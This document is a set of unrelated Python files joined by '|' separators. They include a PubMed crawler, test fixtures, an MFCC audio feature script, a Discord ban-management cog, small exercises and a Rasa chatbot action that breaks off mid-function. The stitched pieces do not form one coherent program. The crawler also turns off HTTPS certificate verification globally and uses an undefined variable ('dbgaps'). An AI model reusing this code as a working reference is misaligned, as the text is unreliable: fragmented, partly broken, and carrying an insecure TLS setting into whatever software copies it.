if args.wallet is None and len(os.environ.get("WALLET", "")) > 0:
args.wallet = os.environ["WALLET"]
if args.config_password is None and len(os.environ.get("CONFIG_PASSWORD", "")) > 0:
args.config_password = os.environ["CONFIG_PASSWORD"]
# If no password is given from the command line, prompt for one.
if args.config_password is None:
if not login_prompt():
return
asyncio.get_event_loop().run_until_complete(quick_start(args))
if __name__ == "__main__":
main()
|
import pdb
x = [1,2,3]
y = 5
z = 6
a = y + z
print(a)
pdb.set_trace()
b = x + y # bug
print(b) |
"""PubMed Crawler of CSBC/PS-ON Publications.
author: nasim.sanati
author: milen.nikolov
author: verena.chung
"""
import os
import re
import argparse
import getpass
import ssl
from datetime import datetime
import requests
from Bio import Entrez
from bs4 import BeautifulSoup
import synapseclient
import pandas as pd
from alive_progress import alive_bar
def login():
"""Log into Synapse. If cached info not found, prompt user.
Returns:
syn: Synapse object
"""
try:
syn = synapseclient.login(silent=True)
except Exception:
print("Cached credentials not found; please provide",
"your Synapse username and password.")
username = input("Synapse username: ")
password = getpass.getpass("Synapse password: ").encode("utf-8")
syn = synapseclient.login(
username=username, password=password,
rememberMe=True, silent=True)
return syn
def get_args():
"""Set up command-line interface and get arguments."""
parser = argparse.ArgumentParser(
description="Scrap PubMed information from a list of grant numbers"
+ " and put the results into a CSV file. Table ID can be provided"
+ " if interested in only scrapping for new publications.")
# TODO: default to the grants table/view in the "CSBC PS-ON DB" project
parser.add_argument("-g", "--grantview_id",
type=str, default="syn21918972",
help="Synapse table/view ID containing grant numbers in"
+ " 'grantNumber' column. (Default: syn21918972)")
parser.add_argument("-t", "--table_id",
type=str,
help="Current Synapse table holding PubMed info.")
parser.add_argument("-f", "--table_file",
type=str,
help="Local file table holding PubMed info.")
parser.add_argument("-o", "--output",
type=str, default="publications_"
+ datetime.today().strftime('%m-%d-%Y'),
help="Filename for output CSV. (Default:"
+ " publications_<current-date>)")
return parser.parse_args()
def get_view(syn, table_id):
"""Get Synapse table/data view containing grant numbers.
Assumptions:
Syanpse table/view has column called 'grantNumber'
Returns:
dataframe: consortiums and their project descriptions.
"""
results = syn.tableQuery(
f"select * from {table_id}").asDataFrame()
return results[~results['grantNumber'].isnull()]
def get_grants(df):
"""Get list of grant numbers from dataframe.
Assumptions:
Dataframe has column called 'grantNumber'
Returns:
set: valid grant numbers, e.g. non-empty strings
"""
print(f"Querying for grant numbers...", end="")
grants = set(df.grantNumber.dropna())
print(f"{len(grants)} found\n")
return list(sorted(grants))
def get_pmids(grants, year_start=2018, year_end=2021):
"""Get list of PubMed IDs using grant numbers as search param.
Returns:
set: PubMed IDs
"""
print("Getting PMIDs from NCBI...")
all_pmids = set()
# Brian's request: add check that pubs. are retreived for each grant number
count = 1
for grant in grants:
print(f" {count:02d}. Grant number {grant}...", end="")
handle = Entrez.esearch(db="pubmed", term=grant,
datetype="pdat", mindate=year_start, maxdate=year_end,
retmax=1_000_000, retmode="xml", sort="relevance")
pmids = Entrez.read(handle).get('IdList')
handle.close()
all_pmids.update(pmids)
print(f"{len(pmids)} found")
count += 1
print(f"Total unique publications: {len(all_pmids)}\n")
return all_pmids
def parse_header(header):
"""Parse header div for pub. title, authors journal, year, and doi."""
# TITLE
title = header.find('h1').text.strip()
# JOURNAL
journal = header.find('button').text.strip()
# PUBLICATION YEAR
pub_date = header.find('span', attrs={'class': "cit"}).text
year = re.search(r"(\d{4}).*?[\.;]", pub_date).group(1)
# DOI
doi_cit = header.find(attrs={'class': "citation-doi"})
doi = doi_cit.text.strip().lstrip("doi: ").rstrip(".") if doi_cit else ""
# AUTHORS
authors = [parse_author(a) for a in header.find_all(
'span', attrs={'class': "authors-list-item"})]
authors = [a for a in authors if a]
return (title, journal, year, doi, authors)
def parse_author(item):
"""Parse author name from HTML 'author-list-item"""
try:
author = item.find('a', attrs={'class': "full-name"}).text
except AttributeError:
author = item.find('span', attrs={'class': "full-name"}).text
return author
def parse_grant(grant):
"""Parse for grant number from grant annotation."""
if len(grant):
grant = re.sub(r'RO', 'R0', grant)
grant_info = re.search(r"([A-Z][A-Z](\s|-)*\d{3,})[ /-]", grant, re.I)
if grant_info is not None:
grant_number = grant_info.group(1).upper()
return re.sub(r'(\s|-)', '', grant_number)
def get_related_info(pmid):
"""Get related information associated with publication.
Entrez will be used for optimal retrieval (since NCBI will kick
us out if we web-scrap too often).
Returns:
dict: XML results for GEO, SRA, and dbGaP
"""
handle = Entrez.elink(dbfrom="pubmed", db="gds,sra,gap", id=pmid,
remode="xml")
results = Entrez.read(handle)[0].get('LinkSetDb')
handle.close()
related_info = {}
for result in results:
db = re.search(r"pubmed_(.*)", result.get('LinkName')).group(1)
ids = [link.get('Id') for link in result.get('Link')]
handle = Entrez.esummary(db=db, id=",".join(ids))
soup = BeautifulSoup(handle, "lxml")
handle.close()
related_info[db] = soup
return related_info
def parse_geo(info):
"""Parse and return GSE IDs."""
gse_ids = []
if info:
tags = info.find_all('item', attrs={'name': "GSE"})
gse_ids = ["GSE" + tag.text for tag in tags]
return gse_ids
def parse_sra(info):
"""Parse and return SRX/SRP IDs."""
srx_ids = srp_ids = []
if info:
tags = info.find_all('item', attrs={'name': "ExpXml"})
srx_ids = [re.search(r'Experiment acc="(.*?)"', tag.text).group(1)
for tag in tags]
srp_ids = {re.search(r'Study acc="(.*?)"', tag.text).group(1)
for tag in tags}
return srx_ids, srp_ids
def parse_dbgap(info):
"""Parse and return study IDs."""
gap_ids = []
if info:
tags = info.find_all('item', attrs={'name': "d_study_id"})
gap_ids = [tag.text for tag in tags]
return gap_ids
def make_urls(url, accessions):
"""Create NCBI link for each accession in the iterable.
Returns:
str: list of URLs
"""
url_list = [url + accession for accession in list(accessions)]
return ", ".join(url_list)
def scrape_info(pmids, curr_grants, grant_view):
"""Create dataframe of publications and their pulled data.
Returns:
df: publications data
"""
columns = ["doi", "journal", "pubMedId", "pubMedUrl",
"publicationTitle", "publicationYear", "keywords",
"authors", "grantNumber",
"gseAccns", "gseUrls", "srxAccns", "srxUrls",
"srpAccns", "srpUrls", "dbgapAccns", "dbgapUrls"]
if not os.environ.get('PYTHONHTTPSVERIFY', '') \
and getattr(ssl, '_create_unverified_context', None):
ssl._create_default_https_context = ssl._create_unverified_context
table = []
with alive_bar(len(pmids)) as progress:
for pmid in pmids:
session = requests.Session()
url = f"https://www.ncbi.nlm.nih.gov/pubmed/?term={pmid}"
soup = BeautifulSoup(session.get(url).content, "lxml")
# HEADER
# Contains: title, journal, pub. date, authors, pmid, doi
header = soup.find(attrs={'id': "full-view-heading"})
# PubMed utilizes JavaScript now, so content does not always
# fully load on the first try.
if not header:
soup = BeautifulSoup(session.get(url).content, "lxml")
header = soup.find(attrs={'id': "full-view-heading"})
title, journal, year, doi, authors = parse_header(header)
authors = ", ".join(authors)
# GRANTS
try:
grants = [g.text.strip() for g in soup.find(
'div', attrs={'id': "grants"}).find_all('a')]
# Filter out grant annotations not in consortia.
grants = {parse_grant(grant) for grant in grants}
# if re.search(r"CA\d", grant, re.I)}
grants = list(filter(lambda x: x in curr_grants, grants))
except AttributeError:
grants = []
# KEYWORDS
abstract = soup.find(attrs={"id": "abstract"})
try:
keywords = abstract.find(text=re.compile(
"Keywords")).find_parent("p").text.replace(
"Keywords:", "").strip()
except AttributeError:
keywords = ""
# RELATED INFORMATION
# Contains: GEO, SRA, dbGaP
related_info = get_related_info(pmid)
gse_ids = parse_geo(related_info.get('gds'))
gse_url = make_urls(
"https://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=", gse_ids)
srx, srp = parse_sra(related_info.get('sra'))
srx_url = make_urls("https://www.ncbi.nlm.nih.gov/sra/", srx)
srp_url = make_urls(
"https://trace.ncbi.nlm.nih.gov/Traces/sra/?study=", srp)
dbgap = parse_dbgap(related_info.get('gap'))
dbgap_url = make_urls(
"https://www.ncbi.nlm.nih.gov/projects/gap/cgi-bin/study.cgi?study_id=",
dbgap
)
row = pd.DataFrame(
[[doi, journal, pmid, url, title, year, keywords, authors,
grants, gse_ids, gse_url,
srx, srx_url, list(srp), srp_url, dbgaps, dbgap_url]],
columns=columns)
table.append(row)
session.close()
# Save table
tmp_tbl = pd.concat(table)
tmp_tbl.to_csv("pubs_tmp.tsv", index=False, sep="\t", encoding="utf-8")
# Increment progress bar animation.
progress()
return pd.concat(table)
def find_publications(syn, args):
"""Get list of publications based on grants of consortia."""
grant_view = get_view(syn, args.grantview_id)
grants = get_grants(grant_view)
pmids = get_pmids(grants)
# If user provided a table ID, only scrap info from
# publications not already listed in the provided table.
if args.table_id:
print(f"Comparing with table {args.table_id}...")
current_publications = syn.tableQuery(
f"select * from {args.table_id}").asDataFrame()
current_pmids = {re.search(r"[/=](\d+)$", i).group(1)
for i in list(current_publications.pubMedUrl)}
pmids -= current_pmids
print(f" New publications found: {len(pmids)}\n")
# If user provided a table file, only scrap info from
# publications not already listed in the provided table.
if args.table_file:
print(f"Comparing with table {args.table_file}...")
current_publications = pd.read_csv(args.table_file, sep='\t')
current_pmids = {re.search(r"[/=](\d+)$", i).group(1)
for i in list(current_publications.pubMedUrl)}
pmids -= current_pmids
print(f" New publications found: {len(pmids)}\n")
print(f"Pulling information from publications...")
table = scrape_info(sorted(pmids), grants, grant_view)
table.to_csv(args.output + ".tsv", index=False, sep="\t", encoding="utf-8")
print("DONE")
def main():
"""Main function."""
syn = login()
args = get_args()
# In order to make >3 Entrez requests/sec, 'email' and 'api_key'
# params need to be set.
Entrez.email = os.getenv('ENTREZ_EMAIL')
Entrez.api_key = os.getenv('ENTREZ_API_KEY')
find_publications(syn, args)
if __name__ == "__main__":
main()
|
from copy import deepcopy
from datetime import date, timedelta
from docx.document import Document
from docx.oxml import CT_P, CT_Tbl
from docx.table import _Cell, Table
from docx.text.paragraph import Paragraph
from onegov.translator_directory.collections.certificate import \
LanguageCertificateCollection
from onegov.translator_directory.collections.language import LanguageCollection
from onegov.translator_directory.collections.translator import \
TranslatorCollection
from onegov.translator_directory.models.translator import GENDERS
translator_data = dict(
state='published',
pers_id=1234,
first_name='Hugo',
last_name='Benito',
admission=None,
withholding_tax=False,
self_employed=False,
gender=list(GENDERS.keys())[0],
date_of_birth=date.today(),
nationality='CH',
address='Downing Street 5',
zip_code='4000',
city='Luzern',
drive_distance=None,
social_sec_number='756.1234.4568.90',
bank_name='R-BS',
bank_address='Bullstreet 5',
account_owner='Hugo Benito',
iban='',
email='hugo@benito.com',
tel_mobile='079 000 00 00',
tel_office='041 444 44 44',
tel_private=None,
availability='always',
profession='craftsman',
occupation='baker',
operation_comments='',
confirm_name_reveal=None,
date_of_application=date.today() - timedelta(days=100),
date_of_decision=date.today() - timedelta(days=50),
proof_of_preconditions='all okay',
agency_references='Some ref',
education_as_interpreter=False,
comments=None,
expertise_professional_guilds=tuple(),
expertise_professional_guilds_other=tuple(),
expertise_interpreting_types=tuple()
)
def create_languages(session):
languages = []
collection = LanguageCollection(session)
for lang in ('German', 'French', 'Italian', 'Arabic'):
languages.append(collection.add(name=lang))
return languages
def create_certificates(session):
certs = []
collection = LanguageCertificateCollection(session)
for cert in ('AAAA', 'BBBB', 'CCCC', 'DDDD'):
certs.append(collection.add(name=cert))
return certs
def create_translator(translator_app, email=None, **kwargs):
data = deepcopy(translator_data)
for key in kwargs:
if key in data:
data[key] = kwargs[key]
if email:
data['email'] = email
return TranslatorCollection(translator_app).add(**data)
def create_translators(translator_app, count=1):
translators = TranslatorCollection(translator_app)
results = []
for i in range(count):
data = deepcopy(translator_data)
data['pers_id'] = i
data['email'] = f'translator{i}@test.com'
data['first_name'] = f'trans_{1}'
data['last_name'] = f'later_{1}'
results.append(translators.add(**data))
return results
def iter_block_items(parent):
""" Recursively iterates over the elements of the .docx document.
Only use this for testing.
See `https://github.com/python-openxml/python-docx/issues/40`
"""
if isinstance(parent, Document):
parent_elm = parent.element.body
elif isinstance(parent, _Cell):
parent_elm = parent._tc
else:
raise ValueError("Error parsing word file. ")
for child in parent_elm.iterchildren():
if isinstance(child, CT_P):
yield Paragraph(child, parent)
elif isinstance(child, CT_Tbl):
table = Table(child, parent)
for row in table.rows:
for cell in row.cells:
yield from iter_block_items(cell)
|
import os
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import librosa
import librosa.display
import warnings
warnings.filterwarnings('ignore')
''' FMA '''
# MFCC
for dir in os.scandir('../data/project_data/mini/fma'):
print(str(dir)[-5:-2])
files = []
labels = []
zcrs = []
spec_centroids = []
spec_rolloffs = []
mfccs_1 = []
mfccs_2 = []
mfccs_3 = []
mfccs_4 = []
mfccs_5 = []
mfccs_6 = []
mfccs_7 = []
mfccs_8 = []
mfccs_9 = []
mfccs_10 = []
mfccs_11 = []
mfccs_12 = []
mfccs_13 = []
mfccs_14 = []
mfccs_15 = []
mfccs_16 = []
mfccs_17 = []
mfccs_18 = []
mfccs_19 = []
mfccs_20 = []
for file in librosa.util.find_files(dir):
label = str(file).split('.')[0][43:]
if label in ['experimental', 'instrumental', 'international']:
continue
y, sr = librosa.core.load(file)
filename = str(file)[43:]
files.append(filename)
label = str(file).split('.')[0][43:]
labels.append(label)
# Calculating zero-crossing rates
zcr = librosa.feature.zero_crossing_rate(y)
zcrs.append(np.mean(zcr))
# Calculating the spectral centroids
spec_centroid = librosa.feature.spectral_centroid(y)
spec_centroids.append(np.mean(spec_centroid))
# Calculating the spectral rolloffs
spec_rolloff = librosa.feature.spectral_rolloff(y)
spec_rolloffs.append(np.mean(spec_rolloff))
# Calculating the first 13 mfcc coefficients
mfcc = librosa.feature.mfcc(y=y, sr=sr, hop_length=512, n_mfcc=20)
mfcc_scaled = np.mean(mfcc.T, axis=0)
mfccs_1.append(mfcc_scaled[0])
mfccs_2.append(mfcc_scaled[1])
mfccs_3.append(mfcc_scaled[2])
mfccs_4.append(mfcc_scaled[3])
mfccs_5.append(mfcc_scaled[4])
mfccs_6.append(mfcc_scaled[5])
mfccs_7.append(mfcc_scaled[6])
mfccs_8.append(mfcc_scaled[7])
mfccs_9.append(mfcc_scaled[8])
mfccs_10.append(mfcc_scaled[9])
mfccs_11.append(mfcc_scaled[10])
mfccs_12.append(mfcc_scaled[11])
mfccs_13.append(mfcc_scaled[12])
mfccs_14.append(mfcc_scaled[13])
mfccs_15.append(mfcc_scaled[14])
mfccs_16.append(mfcc_scaled[15])
mfccs_17.append(mfcc_scaled[16])
mfccs_18.append(mfcc_scaled[17])
mfccs_19.append(mfcc_scaled[18])
mfccs_20.append(mfcc_scaled[19])
df = pd.DataFrame({
'files': files,
'zero_crossing_rate': zcrs,
'spectral_centroid': spec_centroids,
'spectral_rolloff': spec_rolloffs,
'mfcc_1': mfccs_1,
'mfcc_2': mfccs_2,
'mfcc_3': mfccs_3,
'mfcc_4': mfccs_4,
'mfcc_5': mfccs_5,
'mfcc_6': mfccs_6,
'mfcc_7': mfccs_7,
'mfcc_8': mfccs_8,
'mfcc_9': mfccs_9,
'mfcc_10': mfccs_10,
'mfcc_11': mfccs_11,
'mfcc_12': mfccs_12,
'mfcc_13': mfccs_13,
'mfcc_14': mfccs_14,
'mfcc_15': mfccs_15,
'mfcc_16': mfccs_16,
'mfcc_17': mfccs_17,
'mfcc_18': mfccs_18,
'mfcc_19': mfccs_19,
'mfcc_20': mfccs_20,
'labels': labels
})
print(df)
df.to_csv('./project/mini/data/fma_genres_mfcc_{}.csv'.format(str(dir)[-5:-2]), index=False)
|
import json
import asyncio
import traceback
from typing import Sequence
from datetime import datetime, timedelta
import aiosqlite
from discord.ext import commands
from potato_bot.bot import Bot
from potato_bot.cog import Cog
from potato_bot.types import Job, UserID
from potato_bot.utils import minutes_to_human_readable
from potato_bot.checks import is_admin
from potato_bot.constants import SERVER_HOME
# TODO: remove these
class BanEntry:
def __init__(
self,
user_id,
user_name,
minutes,
date,
reason,
ip,
client_id,
admin_id,
admin_name,
):
self.user_id = user_id
self.user_name = user_name
self.minutes = int(minutes)
self.date = date
self.reason = reason
self.ip = ip
self.client_id = client_id
self.admin_id = admin_id
self.admin_name = admin_name
@classmethod
def from_file(cls, data):
return cls(
user_id=data["userId"],
user_name=data["userName"],
minutes=data["minutes"],
date=data["dateTimeOfBan"],
reason=data["reason"],
ip=data["ipAddress"],
client_id=data["clientId"],
admin_id=data["adminId"],
admin_name=data["adminName"],
)
def to_dict(self):
return {
"userId": self.user_id,
"userName": self.user_name,
"minutes": self.minutes,
"dateTimeOfBan": self.date,
"reason": self.reason,
"ipAddress": self.ip,
"clientId": self.client_id,
"adminId": self.admin_id,
"adminName": self.admin_name,
}
@property
def title(self):
return self.reason.split("\n")[0]
@property
def expired(self):
date = self.date
minutes = self.minutes
# https://discord.com/channels/273774715741667329/312454684021620736/781461129427681310
parsed_date = datetime.strptime(
date.replace(" ", ""), "%Y-%m-%dT%H:%M:%S.%f0%z"
)
return parsed_date + timedelta(minutes=minutes) < datetime.now(
tz=parsed_date.tzinfo
)
class UserEntry:
def __init__(self, id, name, duration, ban_count):
self.id = id
self.name = name
self.duration = int(duration)
self.ban_count = ban_count
class Bans(Cog):
"""Ban related commands"""
def __init__(self, bot: Bot):
super().__init__(bot)
self.bans_file = SERVER_HOME / "admin" / "banlist.json"
self.job_bans_file = SERVER_HOME / "admin" / "jobBanlist.json"
self._start_tasks()
def _start_tasks(self):
self.bot.loop.create_task(
self._watch_task(self.bans_file, self._bans_file_modified)
)
self.bot.loop.create_task(
self._watch_task(self.job_bans_file, self._job_bans_file_modified)
)
@commands.group(invoke_without_command=True, ignore_extra=False)
async def bans(self, ctx):
"""List bans"""
users = await self.fetch_all_users()
if not users:
return await ctx.send("No bans recorded yet")
users = sorted(users, key=lambda u: u.name.lower())
total_duration = minutes_to_human_readable(sum(u.duration for u in users))
await ctx.send(
f"Bans: **{sum(u.ban_count for u in users)}**\nDuration: **{total_duration}**"
)
paginator = commands.Paginator(
prefix="```",
suffix="```",
)
for i, user in enumerate(users):
paginator.add_line(
f"{i + 1:>2}. {user.name}: {user.ban_count} bans, {minutes_to_human_readable(user.duration)}"
)
for page in paginator.pages:
await ctx.send(page)
def _ban_expired(self, date: str, minutes: int):
# https://discord.com/channels/273774715741667329/312454684021620736/781461129427681310
parsed_date = datetime.strptime(
date.replace(" ", ""), "%Y-%m-%dT%H:%M:%S.%f0%z"
)
return parsed_date + timedelta(minutes=minutes) < datetime.now(
tz=parsed_date.tzinfo
)
def _bans_to_paginator(self, bans: Sequence[aiosqlite.Row]) -> commands.Paginator:
user_id = bans[0]["userId"]
total_duration = minutes_to_human_readable(
int(sum(ban["minutes"] for ban in bans))
)
paginator = commands.Paginator(
prefix=f"`{user_id}` has **{len(bans)}** ban(s) for **{total_duration}** in total```"
)
longest_index = len(str(len(bans)))
for i, ban in enumerate(bans):
title = ban["reason"].split("\n")[0]
ban_expired = self._ban_expired(ban["dateTimeOfBan"], ban["minutes"])
paginator.add_line(
f"{i + 1:>{longest_index}}{'.' if ban_expired else '!'} {ban['adminName']}: {title}"
)
return paginator
@bans.command(name="name")
async def _name_bans(self, ctx, user_name: str):
"""Fetch user bans using name"""
async with ctx.db.cursor() as cur:
await cur.execute(
"""
SELECT a.userId
FROM bans a
INNER JOIN bans b
ON
a.userName = b.userName
AND a.userId != b.userId
AND a.userName = ? COLLATE NOCASE
GROUP BY a.userId
""",
(user_name,),
)
conflicts = await cur.fetchall()
nl = "\n"
if conflicts:
return await ctx.send(
f"Conflicting IDs detected for name **{user_name}**: ```\n{nl.join(c['userId'] for c in conflicts)}```"
)
await cur.execute(
"""
SELECT
userId,
userName,
dateTimeOfBan,
minutes,
reason,
adminName
FROM bans
WHERE userName = ? COLLATE NOCASE
""",
(user_name,),
)
bans = await cur.fetchall()
if not bans:
return await ctx.send("No bans recorded for name")
paginator = self._bans_to_paginator(bans)
for page in paginator.pages:
await ctx.send(page)
@bans.command(name="id")
async def _id_bans(self, ctx, user_id: UserID):
"""Fetch user bans using id"""
async with ctx.db.cursor() as cur:
await cur.execute(
"""
SELECT
userId,
userName,
dateTimeOfBan,
minutes,
reason,
adminName
FROM bans
WHERE userId = ?
""",
(user_id,),
)
bans = await cur.fetchall()
if not bans:
return await ctx.send("No bans recorded for id")
paginator = self._bans_to_paginator(bans)
for page in paginator.pages:
await ctx.send(page)
@commands.command(aliases=["ub"])
@is_admin()
async def unban(self, ctx, user_id: UserID):
"""
Add unban to queue
Unban is only be done after restarting server
"""
async with ctx.db.cursor(commit=True) as cur:
await cur.execute(
"INSERT INTO unban_queue (user_id) VALUES (?)", (user_id,)
)
await ctx.send(f"Added `{user_id}` to unban queue")
@commands.command(aliases=["ujb"])
@is_admin()
async def unjobban(self, ctx, user_id: UserID, *jobs: Job):
"""
Add job unbans to queue
Unban is only be done after restarting server
"""
if not jobs:
return await ctx.send("No jobs provided")
async with ctx.db.cursor(commit=True) as cur:
await cur.executemany(
"INSERT INTO job_unban_queue (user_id, job) VALUES (?, ?)",
[(user_id, job.id) for job in jobs],
)
await ctx.send(
f"Added `{user_id}` to job unban queue for jobs: **{', '.join(str(i) for i in jobs)}**"
)
async def fetch_ban(self, user_id, date):
async with self.bot.db.cursor() as cur:
await cur.execute(
"SELECT * FROM bans WHERE userId=? AND dateTimeOfBan=?",
(user_id, date),
)
fetched = await cur.fetchone()
if fetched is None:
return None
return BanEntry(*fetched)
async def fetch_all_users(self):
# TODO: sort by date of latest ban instead
async with self.bot.db.cursor() as cur:
await cur.execute(
"""
SELECT
userId,
userName,
SUM(minutes),
COUNT(userName)
FROM
bans
GROUP BY
userId
""",
)
return [UserEntry(*row) for row in await cur.fetchall()]
async def _bans_file_modified(self):
with open(self.bans_file) as f:
bans = json.loads(f.read())["banEntries"]
skipped = 0
new_bans = []
for obj in bans:
ban = BanEntry.from_file(obj)
if ban.expired:
skipped += 1
if await self.fetch_ban(ban.user_id, ban.date) is None:
new_bans.append(ban.to_dict())
if skipped:
print(f"skipped {skipped}/{len(bans)} bans")
if not new_bans:
return
print(f"Found {len(new_bans)} new ban(s), writing to db")
async with self.bot.db.cursor(commit=True) as cur:
await cur.executemany(
"""
INSERT INTO bans (
userId,
userName,
minutes,
dateTimeOfBan,
reason,
ipAddress,
clientId,
adminId,
adminName
) VALUES (
:userId,
:userName,
:minutes,
:dateTimeOfBan,
:reason,
:ipAddress,
:clientId,
:adminId,
:adminName
)
""",
new_bans,
)
async def _job_bans_file_modified(self):
pass
async def _watch_task(self, path, callback):
print(f"Started watching {path}")
last_modified = None
while True:
await asyncio.sleep(60)
try:
if (mtime := path.stat().st_mtime) == last_modified:
continue
last_modified = mtime
print(f"{path} update detected at {last_modified}")
await callback()
except Exception:
traceback.print_exc()
async def do_unbans(self):
async with self.bot.db.cursor(commit=True) as cur:
await cur.execute("SELECT user_id FROM unban_queue GROUP BY user_id")
user_ids = set(i[0] for i in await cur.fetchall())
if not user_ids:
return []
with open(self.bans_file) as f:
data = json.loads(f.read())
user_bans = []
for ban_entry in data["banEntries"]:
if ban_entry["userId"] not in user_ids:
user_bans.append(ban_entry)
data["banEntries"] = user_bans
# dump early to avoid exceptions and losing file contents
dumped = json.dumps(data)
with open(self.bans_file, "w") as f:
f.write(dumped)
await cur.execute("DELETE FROM unban_queue")
return [str(i) for i in user_ids]
async def do_job_unbans(self):
async with self.bot.db.cursor(commit=True) as cur:
await cur.execute(
"SELECT user_id, job FROM job_unban_queue GROUP BY user_id, job"
)
unbans = await cur.fetchall()
if not unbans:
return []
unbans_by_id = {}
for user_id, job in unbans:
if user_id in unbans_by_id:
unbans_by_id[user_id].add(job)
else:
unbans_by_id[user_id] = set((job,))
with open(self.job_bans_file) as f:
data = json.loads(f.read())
user_bans = []
for ban_entry in data["jobBanEntries"]:
user_id = ban_entry["userId"]
if user_id not in unbans_by_id:
continue
job_bans = []
for job_ban_entry in ban_entry["jobBanEntry"]:
if job_ban_entry["job"] not in unbans_by_id[user_id]:
job_bans.append(job_ban_entry)
# do not add ban entry back if it has no jobs banned
if job_bans:
ban_entry["jobBanEntry"] = job_bans
user_bans.append(ban_entry)
# dump early to avoid exceptions and losing file contents
dumped = json.dumps(data)
with open(self.job_bans_file, "w") as f:
f.write(dumped)
await cur.execute("DELETE FROM job_unban_queue")
return [
f"`{user_id}`: **{', '.join(str(j) for j in jobs)}**"
for user_id, jobs in unbans_by_id.items()
]
def setup(bot):
bot.add_cog(Bans(bot))
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue May 5 17:59:18 2020
@author: TakahiroKurokawa
"""
import sys
def py2_or_py3():
major=sys.version_info.major
if major==2:
return "Python2"
elif major==3:
return "Python3"
else:
return "Neither"
print(py2_or_py3())
#複雑な条件式
def first_item(item):
if len(item)>0:
return item[0]
else:
return None
print(first_item(["book"]))
#シンプルな条件式
def first_item2(item):
if item:
return item[0]
else:
return None
print(first_item2([]))
x="book"
y="note"
print(x==y)
print(x!=y)
print(x is None)
print(x is not None)
items=["book","note"]
print("book" in items)
print("book" not in items)
count={"book":1,
"note":2}
print(1 in count)
|
from urllib import parse
import urllib.request
url = 'http://172.16.1.188:8888/budget/pages/main'
wd = {'wd': '传智播客'}
pw = parse.urlencode(wd)
print(pw)
wd1 = {'wd1': '传'}
pw1 = parse.urlencode(wd1)
print(pw1)
wd2 = {'wd2': '智'}
pw2 = parse.urlencode(wd2)
print(pw2)
wd3 = {'wd3': '播'}
pw3 = parse.urlencode(wd3)
print(pw3)
wd4 = {'wd4': '客'}
pw4 = parse.urlencode(wd4)
print(pw4)
print(parse.unquote('wd=%E4%BC%A0%E6%99%BA%E6%92%AD%E5%AE%A2'))
|
#实验室考核第一题
n=input("请输入一个正整数")
n=int(n)
steps=[]
cnt=0
while n!=1:
if n%2==0:
cnt+=1
n/=2
steps.append('^')
elif n==3:
cnt+=1
n-=1
steps.append('-')
else:
if (n+1)%4==0:
cnt+=1
n+=1
steps.append('+')
else:
cnt+=1
n-=1
steps.append('-')
print(cnt)
for step in steps:
print(step,end='') |
# -*- coding: utf-8 -*-
import csv
import random
import logging
import requests
import numpy as np
from tqdm import tqdm
from typing import Text, Dict, Any, List
import re
from rasa_sdk import Action, Tracker
from rasa_sdk.executor import CollectingDispatcher
from rasa_sdk.forms import FormAction
from rasa_sdk.events import SlotSet, UserUtteranceReverted, ConversationPaused, FollowupAction
from modules.bm25 import bm25_scoring
from modules.functions import build_keywords_list
logger = logging.getLogger(__name__)
# déclare les paramètres de l'IR dans un dict
arg_dict = {}
arg_dict['max_seq_length'] = 512
arg_dict['per_gpu_eval_batch_size'] = 32
arg_dict['es_nb_max_result'] = 3
arg_dict['tolerance'] = 0.01
arg_dict['language'] = 'french'
arg_dict['device'] = 'cpu'
arg_dict['stopwords_csv'] = 'data_ir/stopwords.csv'
arg_dict['artistes_csv'] = 'data_ir/artforness_data_artistes.csv'
arg_dict['oeuvres_csv'] = 'data_ir/artforness_data_oeuvres.csv'
# Setup logging
logging.basicConfig(format = '%(asctime)s - %(levelname)s - %(name)s - %(message)s',
datefmt = '%m/%d/%Y %H:%M:%S',
level = logging.INFO)
logger.warning("Process rank: %s, device: %s, distributed training: %s, 16-bits training: %s",
-1, arg_dict['device'], bool(-1 != -1), '')
class ActionRechercher(Action):
""" Fonction custom de recherche dans la base par l'intervention de deux modèles :
- récupère l'input de l'utilisateur,
- procède à un filtrage verbes-noms par spaCy,
- requête le modèle d'Information Retrieving (IR) qui identifie les sources de réponse,
- complété par le modèle de Reranking (Reranker) qui vérifie la pertinence des sources,
- identifie les n premières propositions de réponse par un seuil de tolérance,
- renvoie le résultat de la recherche à l'utilisateur.
"""
def name(self):
return "action_rechercher"
def run(self, dispatcher, tracker, domain):
# récupère l'intent et la requête du dernier message utilisateur
intent = tracker.latest_message['intent'].get('name')
query = (tracker.latest_message)['text']
# ainsi que la valeur du slot booléen "relance"
relance = tracker.get_slot("relance")
# teste la valeur de l'intent ou du slot "relance"
if intent == "recherche" or relance == True:
# requête l'IR
bm25_result = bm25_scoring(arg_dict['oeuvres_csv'], query)
# teste si outputs non vides
if(len(bm25_result) > 0):
# en déclarant les messages de retours qui seront sélectionnés au hasard
retour = [
"Voilà ce que j'ai trouvé :",
"Voici quelques éléments de réponse :",
"Quelques pistes de réflexion :",
"Hop ! À toi de chercher là-dedans maintenant :"
]
# # en les concaténant tous dans un même message
# message = random.choice(retour)
# for i in range(min(len(bm25_result), arg_dict['es_nb_max_result'])):
# current_titre = bm25_result.iloc[i]['Titre'].replace('\"', '')
# current_lien = bm25_result.iloc[i]['Lien'].replace('\"', '')
# current_lien = re.sub('\s+', '', current_lien)
# message = message + ' \"{}\" \"{}\" '.format(
# current_titre,
# current_lien
# )
# dispatcher.utter_message(message)
# print('message: {}'.format(message))
message = random.choice(retour)
for i in range(min(len(bm25_result), arg_dict['es_nb_max_result'])):
current_titre = bm25_result.iloc[i]['Titre'].replace('\"', '')
current_lien = bm25_result.iloc[i]['Lien'].replace('\"', '')
current_lien = re.sub('\s+', '', current_lien)
message = message + '\n* [{}]({})'.format(
current_titre,
current_lien
)
dispatcher.utter_message(message)
print('message: {}'.format(message))
# puis retourne le slot "recherche" à "reussie",
# et retourne le slot "relance" à "False"
return [
SlotSet("recherche", "reussie"),
SlotSet("relance", False),
UserUtteranceReverted()
]
else:
# si non, renvoie un message d'échec
dispatcher.utter_message("utter_recherche_echouee", tracker)
# puis retourne le slot "recherche" à "echouee",
# et retourne le slot "relance" à "False"
return [
SlotSet("recherche", "echouee"),
SlotSet("relance", False),
UserUtteranceReverted()
]
# sinon retourne un message d'erreur (méthode "Raise" n'atteint pas l'utilisateur)
else:
